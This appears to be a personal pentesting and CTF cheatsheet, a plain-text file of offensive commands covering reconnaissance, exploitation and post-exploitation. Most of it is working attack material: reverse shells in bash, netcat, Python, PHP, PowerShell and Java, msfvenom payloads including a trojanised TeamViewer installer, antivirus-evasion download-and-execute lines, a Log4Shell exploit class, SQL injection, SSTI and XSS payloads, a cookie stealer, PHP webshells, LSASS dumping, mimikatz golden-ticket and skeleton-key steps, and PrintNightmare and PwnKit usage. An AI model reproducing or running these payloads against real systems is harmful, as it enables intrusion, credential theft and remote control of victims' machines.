1337_file.txt

   ______ ____ ____   ____ _  _ ____   ____ ____ __   ____ 
  / ||__ \|__ \|__ |  |_ _\|\/_\|_ _\  |  _\|___\| |  | __\
 /_ | _[ | _[ |  / /    || _><__  ||   | _\ | /  | |__|  ]_
   \||___/|___/ /_/     |/ |/\_/  |/   |/   |/   |___/|___/

Version 1.0
Changes are welcome!
GitHub: https://github.com/Leetcore/1337-observer
This file is my cheatsheet for pentesting and CTFs.

If you read with `less` type `-i` (ignore case) before searching.

Type `/nc` to search.

🔥 HOT HOT HOT
In this file: wordpress fastest cache (php), log4shell (java), printnightmare (windows), 
pwnkit (linux).

# IP setup
host=127.0.0.1
ping $host

# change MAC address (mac change)
openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//'
sudo ifconfig en0 ether  <MAC address>

# Kali terminal setup (podman, docker)
apt install proxychains4 nmap metasploit-framework sqlmap links neovim tor curl golang fish
tor &
proxychains4 -q fish
curl https://www.get-my-ip.info/api/ip

# Micro editor setup
apt install micro git bash-completion

Config in ~/.config/micro/settings.json
{
    "colorscheme": "dracula-tc",
    "lsp.autocompleteDetails": true,
    "lsp.ignoreMessages": "E501",
    "lsp.server": "python=pylsp"
}

# Helix editor setup
flatpak remote-add --if-not-exists flathub https://flathub.org/repo/flathub.flatpakrepo
flatpak remote-add --if-not-exists --subset=verified flathub-verified https://flathub.org/repo/flathub.flatpakrepo
flatpak install flathub com.helix_editor.Helix
echo "alias hx='flatpak run com.helix_editor.Helix'" >> ~/.profile

sudo snap install helix --classic

# Editor language config
apt install python3-pylsp

cat ~/.config/helix/languages.toml
[[language]]
name = "python"

[language-server.pylsp.config.pylsp.plugins]
flake8 = {enabled = true}
autopep8 = {enabled = true}
mccabe = {enabled = true}
pycodestyle = {enabled = true, ignore = ["E501"]}
pyflakes = {enabled = true}
pylint = {enabled = true}
yapf = {enabled = true}
ruff = { enabled = true}

# Linux User Rights (linux, user, rights):
Owner - Group - Other
rwx     rwx     rwx 

r = read = 4
w = write = 2
x = execute = 1
== 7

r = read = 4
w = write = 2
x = execute = 0
== 6

r = read = 4
w = write = 0
x = execute = 1
== 5

# ENCODING (encoding, enc)
string to base64
echo -n "string" | base64

base64 to string
echo -n "base64" | base64 -d

string to hex
echo -n "hex" | xxd -r -p

# HASHES (hash, md5, sha256)
Example Hash Inputs:
5f4dcc3b5aa765d61d8327deb882cf99                                    MD5
5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8                            SHA1
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8	SHA256
$2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy	    BCRYPT
$1$Pl3m5Y95$t3Nk4zEXTCXDP4Vs4cL0p0	                                MD5-Crypt
If a hash has dollar signs "$" in it, this is usually a delimiter between the salt and the hash.
Source: https://www.tunnelsup.com/hash-analyzer/

# leak search (leak, grep)
Search big leaks in a zipped way (bash):
zgrep -ia "@domain.de" BreachCompilation.tar.gz

# grep emails
grep -hioE '([a-z0-9\.\-]+@[a-z0-9\.\-]+)' file.csv

# remove doublications (will sort the list)
sort -u lines.txt
awk '!a[$0]++' lines.txt

# NETCAT (netcat, nc)
# listening for shells (bash):
nc -lvnp 1337

pip3 install pwncat-cs
python3 -m pwncat :1337

# TOR setup (tor, vpn)
You can actually use tor from "tor browser" with proxychains-ng:
Config `proxychains.conf` by changing the last line from `socks4` 
to `socks5  127.0.0.1 9150`.

Check working TOR with `proxychains4 curl https://www.get-my-ip.info/api/ip`

# IMAP (imap, pop3, TSL)
openssl s_client -connect 10.129.14.128:imaps

# HASHCAT (hashcat)
Crack bcrypt hashes:
hashcat -m 3200 bcrypt.hash /usr/share/wordlists/rockyou.txt 

# MSFVENOM (msfvenom, msf, metasploit)
Generate reverse shell exe (bash):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx -o reverse_shell.aspx
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1338 -f exe -o /home/kali/rev.exe
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./Lala.exe

msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

# Python webserver
Host files (bash):
python3 -m http.server 8080

zip -r all.zip *

# Web Root (web root, default):
Apache 	/var/www/html/
Nginx 	/usr/local/nginx/html/
IIS 	c:\inetpub\wwwroot\
XAMPP 	C:\xampp\htdocs\

# WinPeas in memory (windows, security tool)
Download:
https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat

# LinPeas (linpeas, linux, priv)
Download:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

# HIDE FORM AV (anti virus, av, hide):
## open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

## base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

In Powershell:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.11.136:8000/shell.exe','shell.exe')"
IEX(New-Object Net.WebClient).DownloadString('http://...')

# POWERSHELL (powershell, ps)
Download reverse shell from source (cmd):
powershell -c "Invoke-WebRequest -Uri 'http://10.8.10.59:8080/rev.exe' -OutFile 'c:\Windows\Temp\rev.exe'"
powershell -c "Invoke-WebRequest -Uri 'http://10.8.10.59:8080/winPEAS.bat' -OutFile 'c:\Windows\Temp\lin.bat'"

# POWERVIEW (powershell, powerview, ps)
Download:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
powershell-import /opt/PowerSploit-dev/Recon/PowerView.ps1
Invoke-ShareFinder -CheckShareAccess

net user NewUser MyPassword123! /add
net localgroup Administrators /add NewUser

When we provide the hostname, network authentication will attempt first to perform 
Kerberos authentication. Since Kerberos authentication uses hostnames embedded in the 
tickets, if we provide the IP instead, we can force the authentication type to be NTLM.

net user /domain
net user zoe.marshall /domain
net group /domain
net group "Tier 1 Admins" /domain

net accounts /domain

Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com

# EVIL WinRM
Pass the hash (bash):
evil-winrm -i spookysec.local -u administrator -H 0e0363213e37b94221497260b0bcb4fc

# AD (ad, recon)
net sessions
net time
net logons
net share

# John The Ripper (john, jtr, cracking hashes)
Generate hash from files (bash):
/path/other/xls2john excel.xls
zip2john zipfile.zip

Remove spaces and newlines (bash):
echo -n "$hash$xyz" | cut -d "-" -f 1 > hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt crack.hash

# save root (ROOT)
sudo chattr +i /root/flag.txt
ps
sudo kill -9 PID

# Linux
PwnKit (linux, policy kit, root)
Source: https://github.com/ly4k/PwnKit
Download: wget https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit

Run in bash:
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

# VMware Workspace One
Source: https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC

wget https://raw.githubusercontent.com/DrorDvash/CVE-2022-22954_VMware_PoC/main/CVE-2022-22954.py
python3 CVE-2022-22954.py example.com "cat /etc/passwd"

wget https://raw.githubusercontent.com/DrorDvash/CVE-2022-22954_VMware_PoC/main/CVE-2022-22954.py

# Priv Escalation (priv esc):
linpeas: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Check sudo apps you can run:
sudo -l

Hijack path:
which tar
echo "/bin/bash" > tar
echo $PATH
export PATH=/tmp:$PATH

# find suid binaries
find / -perm -4000 2>/dev/null
bash -p

From user to root (Privilege Escalation)
find / -perm +6000 2>/dev/null

# Find files (find user files)
find / -user username 2>/dev/null 

# Docker (priv, escalation, root)
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Read root files with error messages (unstable):
command_you_can_run --var-in-there="/root/flag.txt"

Core dumps:
ulimit -S -c unlimited
kill -11 pid
cat /var/crash/...

Proc:
/proc/net/tcp
/proc/sched_debug
/proc/pid/cmdline

# SAMBA (samba)
enum4linux host
searchsploit samba

# SMB
smbmap -H 10.10.10.3

# SMBCLIENT
smbclient -N -L \\\\ip
smbclient \\\\ip\\sharename

# PHP rfi (rfi, smb, shell, webshell, php)
impacket-smbserver -smb2support share $(pwd)
/index.php?language=\\<OUR_IP>\shell.php&cmd=whoami

# MINIMODEM
Ascii to WAV:
echo -n "string" | minimodem -t -f 1200.wav 1200

Wav to ascii:
minimodem -r -f 1200.wav 1200

# NMAP (nmap, port)
sudo nmap -sVC -sS host
nmap -A --top-ports 1000 host

Ping Scan:
sudo nmap 10.10.1.1 -sn -PE --packet-trace -oA hosts --reason

Windows: ttl=128

open|filtered = firewall / packet filter
closed|filtered	= firewall / packet filter

SNMP example with script wildcards
sudo nmap --script=snmp* -sU IP

nmap -sV --script *vulners* --script-args mincvss=9 host

Fast scanning a list of hosts:
nmap --top-ports 100 --open -sV -T5 --script *vulners* --script-args mincvss=9 --stats-every 60s -iL domains.txt -oN nmap.txt

Decoy scan (decoy):
nmap -A ip -D RND:5

Firewall/IDS Tricks (fw, firewall, ids, port):
sudo nmap 10.10.1.1 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53
ncat -nv --source-port 53 10.10.1.1 50000

Nmap with searchsploit:
nmap -sV -sC host -oX host.xml
searchsploit --nmap host.xml

# SEARCHSPLOIT
searchsploit "searchword"
searchsploit -m 123idofexploit
searchsploit -x 123idofexploit

# SQL Injection (SQLi, SQL, db)
Auth bypass:
admin'-- 

Check for SQLi:
' OR 1=1

Check columns if id and postgresql / mysql db::
id=1 order by 5
id=-1 union select 1,2,3,4
id=-1 union select 1,2,version(),4
id=-1 union select 1,2,user(),4
id=1 union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database() --+
id=1 union all select 1,,2,group_concat(column_name),4 from information_schema.columns where table_schema=database() and table_name='users'--+
id=1 union all select group_concat(id),group_concat(username),group_concat(password) from users where table_schema=database()--+
id=Gifts' union select 1,2,concat(username, ' ', password),4 from users --+
filter?category=Accessories' union all select table_name,NULL FROM information_schema.tables --%20

if query and where, dual for oracle db:
filter?category=Accessories' union all select 'a','b' from dual--%20
filter?category=Accessories' union all select banner,'b' from v$version--%20
filter?category=Accessories' union all select column_name,null FROM USER_TAB_COLUMNS WHERE table_name = 'USERS_ZFQQIK' --%20

Blind SQL Injection:
and 1=2 union select null from users where password like 'a%' --+

Check string output fields
filter?category=Gifts' union select null,'a',null --+

Get banner:
Oracle:     SELECT banner FROM v$version
SELECT:     version FROM v$instance
Microsoft:  SELECT @@version
PostgreSQL: SELECT version()
MySQL:      SELECT @@version

In SQL:
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';

# POSTGRESS (postgress, postgressql)
psql -h localhost -U postgres
\c database
\d (list)
select * from users

# SQLMAP
Save full request with header and body in request.txt:
sqlmap -R request.txt --batch --random-refer

# nosql injection (SQL):
username=admin&password[$ne]=admin
filter?category=Gifts' || 'Pets

{"username":{"$ne":""},"password":"peter"}
{"username":{"$regex":"admin.*"},"password":{"$ne":""}}

# RUBY template injection (ruby, ssti)
?message=<%= EXPRESSION %>

# WPSCAN (wordpress, wpscan)
enumerate plugins, themes etc
wpscan --url http://domain -e vp,dbe,cb

# wordpress wp fastest cache (wp, plugin)
sqlmap --dbms=mysql -u "http://domain.com/wp-login.php" --cookie='wordpress_logged_in=*' --level=2 --banner --batch

# SSH (port forwarding)
ssh -L 3389:10.200.115.35:3389 -i id.key root@holo.live

# SCP (scp, ssh, copy, file):
scp /path/of/your/local/filename username@hostname:/path/to/remote/server/folder

# upload (-l maxspeed)
scp -l 1000000 file.zip root@127.0.0.1:/tmp

# download (-l maxspeed)
scp -l 1000000 root@127.0.0.1:/tmp .

# REVERSE SHELLS (upgrade shell)
Upgrade shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
optional:
(inside the nc session) CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

# REV SHELLS (rev shells)
bash
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'
bash -i >& /dev/tcp/10.10.10.10/9001 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|powershell -i 2>&1|nc 10.18.20.243 1337 >/tmp/f

SH
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.177 1337 >/tmp/f
rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7Csh+-i+2%3E%261%7Cnc+10.10.14.177+1337+%3E%2Ftmp%2Ff

Python
exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe

PHP
php -r '$sock=fsockopen("10.10.10.10",9001);exec("bash <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>

JSP (jsp):
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

ASP (asp):
<% eval request("cmd") %>

Powershell (powershell, ps):
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

echo "$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()%" | base64

# TUNNELING (chisel, tunnel, ssh, internal)
attacking machine: ./chisel server -p 8000 --reverse
target machine: ./chisel client yourip:8000 R:socks

sudo proxychains nmap -sVC -O 10.200.101.200/24

# LOCAL FILE INCLUSION (PHP)
php://filter/convert.base64-encode/resource=/etc/passwd

String host="192.18.28.2";
int port=4444;
String cmd="bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

# Server side template injection (SSTI, express)
Nunjucks/Express:
In Javascript:
{{range.constructor("return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')")()}}

# GOBUSTER
gobuster dir -u http://host/ -w /usr/share/wordlists/dirb/common.txt
gobuster vhost -u http://host/ -w /usr/share/wordlists/dirb/big.txt | grep 200

# WFUZZ (fuzzing)
--hh = hide response answer with charsize
wfuzz --hh 455 -w /usr/share/seclists/Discovery/Web-Content/big.txt 'http://host/?view=FUZZ'
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://cozyhosting.htb/ -H "Host: FUZZ.cozyhosting.htb" -mc 200

# FFUF (ffuf, fuzz, web)
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.8.208/FUZZ

# DOTDOTPWN (dotdotpwn, php, fuzzing)
dotdotpwn -m http-url -u 'http://subdomain.domain.htb/index.php?page=TRAVERSAL' -k root

# NIKTO
nikto -host http://host/

# LOCAL FILE INCLUSION (lfi, php)
Upload shell via Referer:
curl 'http://host/notexist' -A "<?php system(\$_GET['cmd']);?>"

# GraphQL (graphql)
Try introspection
{"query":"query { \n __schema \n{ \n types \n{ \n name, \n fields \n {\n name \n} \n} \n} \n}"}
{"query":"query {\n getUserSession(email: \"lala\") \n{ \n email \n} \n}"}

# MONGODB
mongo
show dbs
use dbname
db.dbname.find()

# LOG4J (Log4Shell exploit, Java)
Install and start LDAP server that redirects to your exploit class:
https://github.com/mbechler/marshalsec

git clone https://github.com/mbechler/marshalsec.git
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.IP:8000/#Exploit"

Save exploit class to Exploit.java:
Java file:
public class Exploit {
    static {
        try {
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOUR.ATTACKER.IP 1337");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compile exploit to Javacode:
javac Exploit.java

Host Javacode with python:
python3 -m http.server

Wait for reverse shell:
nc -lnvp 1337

Trigger Log4J to connect with your LDAP:
curl 'http://TARGET:8983/?foo=${jndi:ldap://YOUR.IP:1389/Exploit\}'

Extract information from log4j:
Just a string:
${jndi:${lower:l}${lower:d}a${lower:p}://xx.interactsh.com/poc}
${jndi:${lower:l}${lower:d}a${lower:p}://${hostName}.${sys:java.version}.xx.interactsh.com/poc}

# ENUM4LINUX
enum4linux 10.10.82.233

# NFS (nfs, network share, linux)
showmount -e 10.129.57.246
mkdir nfsmount
mount -t nfs 10.129.57.246:/ ./nfsmount/ -o nolock

# dig (enum, dns, ns, nameserver, zone transfer)
dig any @$host support.htb
dig axfr internal.inlanefreight.htb @10.129.216.3
dig axfr @10.10.11.174
dig axfr @10.10.11.174 domain

# DNS RECON (enum, recon, brute force, dns)
dnsrecon -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -d domain.htb -t brt
msfconsole:
search enum_dns
set DOMAIN support.htb
set NS DNS_IP
run

# HYDRA (hydra, forms, post, data)
hydra -L usernames.txt -P passwords.txt ssh://10.10.83.180:22 -I
hydra -L usernames.txt -P passwords.txt imap://10.10.83.180:143 -I
hydra -L usernames.txt -P passwords.txt pop3://10.10.83.180:110 -I
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.60.202 http-post-form '/#:username=^USER^&password=^PASS^:F=/#' -I

# METASPLOIT (metasploit, msfconsole)
Basic msfconsole:
search php
use 2
show options
set RHOSTS 1.1.1.1
set RPORT 22
set LHOST tun0
set LPORT 1337
run -j

# METASPLOIT (metasploit, windows, token)
load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators" 
getuid
ps (find services.exe PID)
migrate 668 (services.exe PID)

Database:
sudo msfdb run
hosts -d (delete hosts)
db_nmap -A --top-ports 1000 10.129.203.65
setg RHOSTS  10.129.203.65 (set global)
use post/multi/recon/local_exploit_suggester

upgrade shell to meterpreter:
sessions -u -1
resolve webservice_database
route add 172.28.101.51/32 -1
run srvhost=127.0.0.1 srvport=9050 version=4a
proxychains nmap 172.28.101.51

hashdump
load kiwi
lsa_dump_sam
lsa_dump_secrets

Custom:
loadpath /usr/share/metasploit-framework/modules/
reload_all

Meterpreter (multi/handler, reverse shell):
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORt 1337
run -j

Portscan in msfconsole:
auxiliary(scanner/portscan/tcp)
set RHOSTS 10.200.115.0/24
set THREADS 5
run -j

# OpenVAS (openvas, kali)
sudo apt install gvm
sudo gvm-check-setup

# WINDOWS (windows)
# printnightmare (PN, print, spool):
Source: https://github.com/calebstewart/CVE-2021-1675.git
Download: wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1

In Powershell:
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default

# Windows Exploit
Download:
https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
shell systeminfo > win10-systeminfo.txt
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2021-03-09-mssb.xls --systeminfo win10-systeminfo.txt

# kerbrute (ad, brute force, pw)
Quelle: https://github.com/ropnop/KERBRUTE
Download: go get github.com/ropnop/kerbrute
In Go binfolder:
./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt

# RUBEUS (rubeus)
Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt

# Impacket (windows)
Source: https://github.com/SecureAuthCorp/impacket
Download: git clone https://github.com/SecureAuthCorp/impacket.git
Scripts are in /examples:
python3 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip MACHINE_IP -request

# POWERVIEW
Source: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
Download: wget https://gist.githubusercontent.com/HarmJ0y/184f9822b195c52dd50c379ed3117993/raw/e5e30c942adb2347917563ef0dafa7054882535a/PowerView-3.0-tricks.ps1

In Powershell:
Get-NetUser | select cn
Get-NetGroup -GroupName *admin*

If we have PRIVILEGED rights, with "hashdump" and "logonpasswords" we can get the hashes and the passwords. This is a fast way to get passwords, but it may not work. For example the AV will interfere.
A better way to do it is this:
	- Do ps and find the LSASS.exe process (It stores our passwords).Remember the PID.
	- Make its dump.
Go to beacon:
	- cd Windows
	- shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\Users\User1\lsass.dmp full 
	- In PID parameter specify PID number of LSASS.exe
	- You can use any writeable directory, for example: C:\Users\User1\lsass.dmp
Analogue of:
	- execute-assembly /opt/cobalt_strike_extension_kit/exe/SharpDump.exe
When you make the dump, download it.
Once downloaded, open mimikatz on your machine and run the following commands. (Put lsass.dmp in the folder with mimikatz)
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords

# MIMIKATZ
In mimikatz:
privilege::debug
token:elevate
sekurlsa::logonpasswords
lsadump::sam
lsadump::lsa /inject

john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT thomas.hash
john hashes.txt -wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5
john --incremental:Lower --incremental:Alpha --incremental:Digits (10 char) --incremental:Alnum
john --mask=?1?1?1?1?1?1?1?1 -1=[A-Z]
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/doc/MASK

crunch 1 6 abcdefg

Export ticket:
sekurlsa::tickets /export
kerberos:ppt [0;3e7]-0-2-40a50000-SE-SEC-WIN10$@LDAP-SE-SEC-DC01.se-sec.local.kirbi

sekurlsa::pth /user:admin /domain:se-sec.local /ntlm:<hash>
sekurlsa::pth /user:admin /domain:se-sec.local /ntlm:<hash> /impersonate
token::list /user:admin

Pass the ticket:
In mimikatz:
kerberos::ptt <ticket>

Check in CMD:
exit
klist
dir \\ip\admin$

Golden/silver ticket:
In mimikatz:
lsadump::lsa /patch
lsadump::lsa /inject /name:krbtgt
Kerberos::golden /user:Administrator /domain:controller.local /sid:$SID /krbtgt:$NTLM /id:$USERID

Golden/silver ticket to access other machines:
Check in mimikatz:
misc::cmd

Skeleton key (every User-PW: mimikatz):
In mimikatz:
misc::skeleton

# LOOTING (loot, chrome)
grep -rl 'password' / 2> /dev/null

https://github.com/djhohnstein/SharpChromium
SharpChrome.exe logins /showall

.git config (GIT, git, loot)
git log -Susername .
git log -Spassword .

# RADARE2 (r2, radare)
aaa (analyze)
afl (analyze functions)
pd (print)
pd1 (print 1)
pdf @main (print function)
s entry0
VV @main (visalize function)

# XSS (xss)
html
"'><script>alert(1)</script>
"';</script><script>alert(/XSS/)</script><"
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
%22%27%3E%3C%68%31%3E%78%73%73%3C%2F%68%31%3E
&#x22;&#x27;&#x3E;&#x3C;&#x68;&#x31;&#x3E;&#x78;&#x73;&#x73;&#x3C;&#x2F;&#x68;&#x31;&#x3E;
&#34&#39&#62&#60&#104&#49&#62&#120&#115&#115&#60&#47&#104&#49&#62

# COOKIE STEALER
new Image().src='http://OUR_IP/index.php?c='+document.cookie
"'><img src=1337xx onerror=this.src='http://10.8.10.59:8080/?'+document.cookie;>

# PHP Local File Inclusion (php, filter, lfi)
index.php?param=php://filter/convert.base64-encode/resource=index
curl http://10.10.11.154/index.php?page=php://filter/convert.base64-encode/resource=index.php | base64 -d

# PHP RCE (php, rce, base64)
http://68.183.35.90:30015/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20/etc/passwd
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat /37809e2f8952f06139011994726d9ef1.txt

# XXE (XML external entities):
In XML:
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>